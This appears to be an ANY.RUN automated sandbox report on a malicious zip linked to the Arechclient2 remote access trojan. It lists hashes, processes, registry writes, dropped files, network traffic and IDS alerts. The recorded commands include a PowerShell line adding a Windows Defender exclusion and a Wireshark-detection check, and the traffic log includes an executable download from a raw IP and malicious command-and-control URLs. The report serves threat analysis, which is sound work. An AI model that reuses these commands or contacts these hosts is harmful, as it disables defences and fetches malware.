| File name: | 4363463463464363463463463.bin.zip |
| Full analysis: | https://app.any.run/tasks/e31ec095-9f04-4512-b2c4-cc3ae66d16d9 |
| Verdict: | Malicious activity |
| Threats: | The Arechclient2 malware is a sophisticated .NET-based Remote Access Trojan (RAT) that collects sensitive information, such as browser credentials, from infected computers. It employs various stealth techniques, including Base64 encoding to obscure its code and the ability to pause activities to evade automated security tools. The malware also can adjust Windows Defender settings and uses code injection to manipulate legitimate processes. |
| Analysis date: | December 22, 2023, 17:40:23 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v5.1 to extract |
| MD5: | AC0143F688CAF564859D33C55E8330A5 |
| SHA1: | 9DDEDD45AABB7E710CFC250D31F99A0444FF2A66 |
| SHA256: | 7242F661D5DAF0648CE62C2768687114A32386DFE48E7806590B5C43EEA35175 |
| SSDEEP: | 96:yooGS2uJx8Kxnl5oeAvgn8QgyF9oKXBINJZDV5BA8N5teIKQ5OSdSqfGJLVW+Hln:/63nl+e3eNJz7B5f5Dd7aHlMi2U |
| .zip | | | ZIP compressed archive (100) |
|---|
| ZipRequiredVersion: | 51 |
|---|---|
| ZipBitFlag: | 0x0009 |
| ZipCompression: | Unknown (99) |
| ZipModifyDate: | 2023:12:22 17:22:14 |
| ZipCRC: | 0x31d44928 |
| ZipCompressedSize: | 4787 |
| ZipUncompressedSize: | 10752 |
| ZipFileName: | 4363463463464363463463463.bin |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 280 | "C:\Windows\system32\dialer.exe" | C:\Windows\SysWOW64\dialer.exe | taskeng.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft Windows Phone Dialer Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 284 | "C:\Users\admin\Desktop\Files\lve5.exe" | C:\Users\admin\Desktop\Files\lve5.exe | 4363463463464363463463463.bin.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 1073807364 Modules
| |||||||||||||||
| 340 | cmd /C tasklist /FI "IMAGENAME eq Wireshark.exe" > C:\Users\admin\AppData\Local\Temp\IsProcessActive.txt | C:\Windows\SysWOW64\cmd.exe | — | Restoro.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 364 | "C:\Users\admin\Desktop\4363463463464363463463463.bin\Files\plugmanzx.exe" | C:\Users\admin\Desktop\4363463463464363463463463.bin\Files\plugmanzx.exe | — | plugmanzx.exe | |||||||||||
User: admin Integrity Level: HIGH Description: WindowsFormsApp3 Exit code: 3221226091 Version: 1.0.0.0 Modules
| |||||||||||||||
| 576 | "C:\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe iusb3mon.dat Media.xml C:\Microsoft\ | C:\un.exe | — | irsetup.exe | |||||||||||
User: admin Company: WinRAR 压缩管理软件中文版 Integrity Level: HIGH Description: 命令行 RAR Exit code: 0 Version: 5.20.0 Modules
| |||||||||||||||
| 664 | C:\Users\admin\AppData\Roaming\images.exe | C:\Users\admin\AppData\Roaming\images.exe | — | taskeng.exe | |||||||||||
User: admin Company: BinanceTech Integrity Level: HIGH Description: Binance Exit code: 0 Version: 1.0.0.0 Modules
| |||||||||||||||
| 684 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\admin\AppData\Roaming\UiKVWpFsayx.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | more.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 884 | "C:\Users\admin\Desktop\4363463463464363463463463.bin\Files\s5.exe" | C:\Users\admin\Desktop\4363463463464363463463463.bin\Files\s5.exe | — | 4363463463464363463463463.bin.exe | |||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 920 | "C:\Users\admin\Desktop\4363463463464363463463463.bin\Files\1701610814-Dvnzfr.exe" | C:\Users\admin\Desktop\4363463463464363463463463.bin\Files\1701610814-Dvnzfr.exe | 4363463463464363463463463.bin.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Version: 1.0.0.0 Modules
| |||||||||||||||
| 920 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Installsetup2.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: .NET Framework installation utility Exit code: 1073807364 Version: 4.8.3761.0 built by: NET48REL1 Modules
| |||||||||||||||
| (PID) Process: | (2004) explorer.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0 |
| Operation: | write | Name: | CheckSetting |
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB010000000425B8FBD140304D952DBE1156DB516600000000020000000000106600000001000020000000DB7CFDADD20035B54FE72E91B52C386E688080B10C096541937D15768230E9B4000000000E8000000002000020000000FC5BD8C24841EC802021354E72CCCB98F326B765B114F6B99237B0E53C70855230000000E5259FA42E3216E6ABD96FBA3A6491DBFE5EABB7874FD90C6180CAAA39FCB4DA5097AFD783F475C120AF35A7DAD783F44000000017650D25D4C3008FF427790B98E977F1147A37B555438BA5F03FADACC116CEA191D18AD610A15D4BB60F12EF1F1AF002B029515D03AC7340FF8EFA43530BF5CD | |||
| (PID) Process: | (3004) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\15A\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (2004) explorer.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithList |
| Operation: | write | Name: | MRUList |
Value: a | |||
| (PID) Process: | (3004) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip | |||
| (PID) Process: | (3004) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\Win7AndW2K8R2-KB3191566-x64.zip | |||
| (PID) Process: | (3004) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (3004) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\curl-8.5.0_3-win64-mingw.zip | |||
| (PID) Process: | (3004) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3004) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3004) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2004 | explorer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\46f433176bc0b3d2.automaticDestinations-ms | binary | |
MD5:6AD5FB9C2DF01FC36B8F237C0A5C7125 | SHA256:637A1EF13A6E520E20BA723D78C3B9CE9D5FF737E817F6C0D997E880CF383151 | |||
| 2992 | 4363463463464363463463463.bin.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F59A01A8B782D93EA6991BC172CEFFB1 | binary | |
MD5:C5DFB849CA051355EE2DBA1AC33EB028 | SHA256:CBB522D7B7F127AD6A0113865BDF1CD4102E7D0759AF635A7CF4720DC963C53B | |||
| 2004 | explorer.exe | C:\Users\admin\Desktop\4363463463464363463463463.bin.exe | executable | |
MD5:2A94F3960C58C6E70826495F76D00B85 | SHA256:2FCAD226B17131DA4274E1B9F8F31359BDD325C9568665F08FD1F6C5D06A23CE | |||
| 2004 | explorer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\4363463463464363463463463.bin.zip.lnk | binary | |
MD5:C72A89197EF806169AC32F894E63103E | SHA256:881789F9C3923F9A12C2A0019D4887DAB0B07555459779490EB1AB6ACA4141BA | |||
| 2992 | 4363463463464363463463463.bin.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed | |
MD5:AC05D27423A85ADC1622C714F2CB6184 | SHA256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D | |||
| 2992 | 4363463463464363463463463.bin.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F59A01A8B782D93EA6991BC172CEFFB1 | binary | |
MD5:E9914E4756DC1F00EF35F2E42D869FC8 | SHA256:4FBBE03F062025B828231CAEB84C325B80CD231D9DEF6DB48A1383BE0D57860F | |||
| 2992 | 4363463463464363463463463.bin.exe | C:\Users\admin\AppData\Local\Temp\TarBEEE.tmp | binary | |
MD5:9C0C641C06238516F27941AA1166D427 | SHA256:4276AF3669A141A59388BC56A87F6614D9A9BDDDF560636C264219A7EB11256F | |||
| 1176 | WPS_Setup.exe | C:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll | executable | |
MD5:B5FC476C1BF08D5161346CC7DD4CB0BA | SHA256:12CB9B8F59C00EF40EA8F28BFC59A29F12DC28332BF44B1A5D8D6A8823365650 | |||
| 3004 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3004.31743\4363463463464363463463463.bin | executable | |
MD5:2A94F3960C58C6E70826495F76D00B85 | SHA256:2FCAD226B17131DA4274E1B9F8F31359BDD325C9568665F08FD1F6C5D06A23CE | |||
| 2004 | explorer.exe | C:\Users\admin\Desktop\4363463463464363463463463.bin | executable | |
MD5:2A94F3960C58C6E70826495F76D00B85 | SHA256:2FCAD226B17131DA4274E1B9F8F31359BDD325C9568665F08FD1F6C5D06A23CE | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2992 | 4363463463464363463463463.bin.exe | GET | 200 | 151.101.2.133:80 | http://secure.globalsign.com/cacert/root-r3.crt | unknown | binary | 867 b | unknown |
2992 | 4363463463464363463463463.bin.exe | GET | 200 | 93.184.221.240:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?440aaa20924fcacc | unknown | compressed | 65.2 Kb | unknown |
2272 | lumtru.exe | POST | 200 | 104.21.24.252:80 | http://soupinterestoe.fun/api | unknown | text | 21 b | unknown |
2272 | lumtru.exe | POST | 200 | 104.21.24.252:80 | http://soupinterestoe.fun/api | unknown | text | 21 b | unknown |
2272 | lumtru.exe | POST | 200 | 104.21.24.252:80 | http://soupinterestoe.fun/api | unknown | html | 4.62 Kb | unknown |
2272 | lumtru.exe | POST | 200 | 104.21.24.252:80 | http://soupinterestoe.fun/api | unknown | text | 21 b | unknown |
2272 | lumtru.exe | POST | 200 | 104.21.24.252:80 | http://soupinterestoe.fun/api | unknown | text | 21 b | unknown |
2992 | 4363463463464363463463463.bin.exe | GET | 200 | 45.197.46.193:80 | http://45.197.46.193/003/tbbhts.exe | unknown | executable | 323 Kb | unknown |
2272 | lumtru.exe | POST | 200 | 104.21.24.252:80 | http://soupinterestoe.fun/api | unknown | text | 21 b | unknown |
2272 | lumtru.exe | POST | 200 | 104.21.24.252:80 | http://soupinterestoe.fun/api | unknown | text | 21 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1220 | svchost.exe | 239.255.255.250:3702 | — | — | — | whitelisted |
352 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
2992 | 4363463463464363463463463.bin.exe | 151.101.2.49:443 | urlhaus.abuse.ch | FASTLY | US | unknown |
2992 | 4363463463464363463463463.bin.exe | 151.101.2.133:80 | secure.globalsign.com | FASTLY | US | unknown |
2992 | 4363463463464363463463463.bin.exe | 93.184.221.240:80 | ctldl.windowsupdate.com | EDGECAST | GB | whitelisted |
2992 | 4363463463464363463463463.bin.exe | 47.75.19.76:443 | windowswps.oss-cn-hongkong.aliyuncs.com | Alibaba US Technology Co., Ltd. | HK | unknown |
2992 | 4363463463464363463463463.bin.exe | 209.205.200.74:80 | oazahotel.com.mk | 24SHELLS | US | unknown |
2992 | 4363463463464363463463463.bin.exe | 5.252.176.77:80 | — | MivoCloud SRL | RU | malicious |
Domain | IP | Reputation |
|---|---|---|
urlhaus.abuse.ch |
| whitelisted |
secure.globalsign.com |
| whitelisted |
ctldl.windowsupdate.com |
| whitelisted |
windowswps.oss-cn-hongkong.aliyuncs.com |
| malicious |
oazahotel.com.mk |
| malicious |
soupinterestoe.fun |
| malicious |
bitbucket.org |
| shared |
bbuseruploads.s3.amazonaws.com |
| shared |
www.996m2m2.top |
| unknown |
kimyen.net |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
2992 | 4363463463464363463463463.bin.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
2992 | 4363463463464363463463463.bin.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2992 | 4363463463464363463463463.bin.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2992 | 4363463463464363463463463.bin.exe | Misc activity | ET HUNTING [TW] Likely Hex Executable String |
2992 | 4363463463464363463463463.bin.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
2992 | 4363463463464363463463463.bin.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
2992 | 4363463463464363463463463.bin.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
2992 | 4363463463464363463463463.bin.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
2992 | 4363463463464363463463463.bin.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2992 | 4363463463464363463463463.bin.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |